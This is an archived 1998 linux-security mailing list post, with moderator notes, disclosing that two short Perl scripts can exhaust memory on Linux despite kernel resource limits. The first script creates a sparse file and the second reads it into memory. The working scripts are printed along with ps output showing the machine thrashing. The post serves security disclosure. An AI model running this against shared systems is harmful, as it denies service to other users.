[2091] in linux-security and linux-alert archive

home help back first fref pref prev next nref lref last post

[linux-security] simple perl script bypasses limits

daemon@ATHENA.MIT.EDU (David Lai)
Tue Nov 24 03:41:13 1998

From: dlai@bacon.esd.sgi.com (David Lai)
To: linux-security@redhat.com
Date: Sat, 21 Nov 1998 13:18:31 -0800 (PST)
Resent-From: linux-security@redhat.com
Resent-Reply-To: linux-security@redhat.com

Any user with shell access, or with access to upload a cgi
script can exploit this to make machine thrash badly.

Seems to circumvent any limits in the kernel

Here are my settings
dlai@whale.home.org:/home/dlai?limit
cputime         unlimited
filesize        20000 kbytes
datasize        8192 kbytes
stacksize       8192 kbytes
coredumpsize    1000000 kbytes
memoryuse       8192 kbytes
descriptors     1024 
memorylocked    8192 kbytes
maxproc         256 

Create a file with a huge hole (can be 4Gb if needed):
   [mod: 2Gb on linux. :-(   -- REW]

#!/usr/bin/perl
system("touch xxx");
open(XXX,"+<xxx");
seek(XXX,90000000,0);
print XXX "A B C\n";
truncate (XXX, 4294967295);
close(XXX);

This one creates a file size 90Megs, but its really sparse.  
"limit filesize" has no effect, this operation succeeds.  Understandable
since the file really only occupies a few blocks on the disk.

Next, create a script that reads the file:

#!/usr/bin/perl
open(XXX,"<xxx");
@abc=<XXX>;
print "read\n";
exit;

Run it, it will circumvent any limit settings on datasize, stacksize,
memoryuse, memorylocked.  It really allocates 90Mb and uses it even
though my limits are set at 8Mb.


ps shows:

 6460 dlai      12   0 53608 8156    72 D       0 34.2 43.4   1:14 readx.pl

(I killed it before it ate all my swap - machine was thrashing badly at
this point).


And another note, on IRIX, the [create file] script fails to run ; kernel
detects limit for filesize exceeded:

? x.pl
File size limit exceeded (core dumped)

[mod: Postscriptum in separate message merged by
moderator.... Verified on a 2.0 system -- REW]

-- 
----------------------------------------------------------------------
Please refer to the information about this list as well as general
information about Linux security at http://www.aoy.com/Linux/Security.
----------------------------------------------------------------------

To unsubscribe:
  mail -s unsubscribe linux-security-request@redhat.com < /dev/null
home help back first fref pref prev next nref lref last post